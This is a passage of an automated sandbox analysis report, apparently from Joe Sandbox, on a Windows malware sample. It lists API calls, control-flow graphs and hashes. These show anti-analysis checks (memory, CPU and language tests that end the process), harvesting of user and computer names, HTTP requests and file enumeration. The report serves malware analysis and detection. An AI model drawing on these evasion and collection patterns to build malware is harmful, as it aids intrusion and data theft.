22a08fb-22a0901 1393->1402 1403 22a0902-22a091d 1393->1403 1404 22a0526-22a0547 1394->1404 1395->1404 1398 22a07e2 1396->1398 1399 22a07e4-22a0822 1396->1399 1401 22a0839-22a083c 1397->1401 1398->1397 1399->1391 1406 22a068f-22a06b2 1400->1406 1407 22a0750-22a077a 1400->1407 1401->1386 1408 22a083e-22a0847 1401->1408 1402->1403 1405 22a054d-22a0550 1404->1405 1409 22a05e0-22a05ef 1405->1409 1410 22a0556-22a056b 1405->1410 1411 22a06ef-22a06fc 1406->1411 1412 22a06b4-22a06ed 1406->1412 1407->1388 1413 22a084b-22a086c 1408->1413 1414 22a0849 1408->1414 1409->1378 1416 22a056f-22a057a 1410->1416 1417 22a056d 1410->1417 1418 22a074b 1411->1418 1419 22a06fe-22a0748 1411->1419 1412->1411 1413->1401 1414->1386 1420 22a059b-22a05bb 1416->1420 1421 22a057c-22a0599 1416->1421 1417->1409 1418->1400 1419->1418 1426 22a05bd-22a05db 1420->1426 1421->1426 1426->1405
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 022A024D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID: cess$kernel32.dll
                                  • API String ID: 4275171209-1230238691
                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                  • Instruction ID: f1b68c4e866eb6bf352efcac94c1e1f5dda4d29739ae1cf08dabacc0efa7f195
                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                  • Instruction Fuzzy Hash: 15527974A11229DFDB64CF98C994BACBBB1BF09304F1480D9E90DAB755DB30AA84CF14

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750AB0), ref: 004198A1
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750C90), ref: 004198BA
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750BA0), ref: 004198D2
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750B70), ref: 004198EA
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750C18), ref: 00419903
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00747988), ref: 0041991B
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,007463E0), ref: 00419933
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,007465A0), ref: 0041994C
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750B58), ref: 00419964
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750BB8), ref: 0041997C
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750CF0), ref: 00419995
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750CA8), ref: 004199AD
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00746540), ref: 004199C5
                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00750A20), ref: 004199DE
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                    • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                    • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                    • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                    • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                    • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                    • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                    • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                    • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                  • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                    • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,007478F8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                  • CloseHandle.KERNEL32(?,00000000,?,007478F8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                  • ExitProcess.KERNEL32 ref: 00416B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 3511611419-0
                                  • Opcode ID: 757631a7605bd19b27fc3a18d5fe2d42be749bdc5fe49fa92823ddfc14995c0f
                                  • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                  • Opcode Fuzzy Hash: 757631a7605bd19b27fc3a18d5fe2d42be749bdc5fe49fa92823ddfc14995c0f
                                  • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                  Control-flow Graph

                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                  • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714
                                  • Opcode ID: 6f5239c701e20752d7d8ba123c44c1d3618565534ec3c3498ef931a8274c7e29
                                  • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                  • Opcode Fuzzy Hash: 6f5239c701e20752d7d8ba123c44c1d3618565534ec3c3498ef931a8274c7e29
                                  • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1492 401220-401247 call 4189b0 GlobalMemoryStatusEx 1495 401273-40127a 1492->1495 1496 401249-401271 call 41da00 * 2 1492->1496 1498 401281-401285 1495->1498 1496->1498 1500 401287 1498->1500 1501 40129a-40129d 1498->1501 1503 401292-401294 ExitProcess 1500->1503 1504 401289-401290 1500->1504 1504->1501 1504->1503
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                  • __aulldiv.LIBCMT ref: 00401258
                                  • __aulldiv.LIBCMT ref: 00401266
                                  • ExitProcess.KERNEL32 ref: 00401294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 3404098578-2766056989
                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                  • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                  • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1506 416af3 1507 416b0a 1506->1507 1509 416aba-416ad7 call 41aad0 OpenEventA 1507->1509 1510 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1507->1510 1515 416af5-416b04 CloseHandle Sleep 1509->1515 1516 416ad9-416af1 call 41aad0 CreateEventA 1509->1516 1515->1507 1516->1510
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,007478F8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                  • CloseHandle.KERNEL32(?,00000000,?,007478F8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                  • ExitProcess.KERNEL32 ref: 00416B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                  • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                  • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                  • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00750148), ref: 00406303
                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,007821A8,00000000,00000000,00400100,00000000), ref: 00406385
                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: d54b89ec47e5697ea434b70e160c2113ab88f323f7f5fb4d33c1f14eb2f801cc
                                  • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                  • Opcode Fuzzy Hash: d54b89ec47e5697ea434b70e160c2113ab88f323f7f5fb4d33c1f14eb2f801cc
                                  • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocComputerNameProcess
                                  • String ID:
                                  • API String ID: 4203777966-0
                                  • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                  • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                  • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                  • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                  • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                  • ExitProcess.KERNEL32 ref: 00401143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                  • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                  • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                  • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007532C2
                                  • Module32First.KERNEL32(00000000,00000224), ref: 007532E2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204131536.0000000000751000.00000040.00000020.00020000.00000000.sdmp, Offset: 00751000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_751000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 3833638111-0
                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                  • Instruction ID: 5a5c316fe29a98059a6b55e4b3c102a164b2ea578db8340c8ee95dd7d304c511
                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                  • Instruction Fuzzy Hash: 1FF0F632200B146FD7203BF5A88DFAE76E8BF49762F100528EA46910D0DBB4ED0E4A61
                                  APIs
                                  • SetErrorMode.KERNEL32(00000400,?,?,022A0223,?,?), ref: 022A0E19
                                  • SetErrorMode.KERNEL32(00000000,?,?,022A0223,?,?), ref: 022A0E1E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                  • Instruction ID: 5c546041dd4a2230b8c0bc4b7f8cb8fd575b4360faf6d49c853655059041b05f
                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                  • Instruction Fuzzy Hash: 69D01232255228B7DB002AD4DC09BCEBB1CDF09BA6F008021FB0DE9480CBB09A4046EA
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                  • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                  • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                  • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                  APIs
                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                  • ExitProcess.KERNEL32 ref: 004011C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 1004333139-0
                                  • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                  • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                  • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                  • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00752FAA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204131536.0000000000751000.00000040.00000020.00020000.00000000.sdmp, Offset: 00751000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_751000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                  • Instruction ID: 8f756fdf406f526298a98ebe38cc7e86f61862d0e37673f35e2cd7af9186e654
                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                  • Instruction Fuzzy Hash: 4D113C79A00208FFDB01DF98C985E99BBF5AF08351F058094F9489B362D775EA54DF80
                                  APIs
                                  • wsprintfA.USER32 ref: 004138CC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-817767981
                                  • Opcode ID: 4998a2a4828bb298670bae06159fd075eb3e5295b92b72b056a379b990e3da95
                                  • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                  • Opcode Fuzzy Hash: 4998a2a4828bb298670bae06159fd075eb3e5295b92b72b056a379b990e3da95
                                  • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
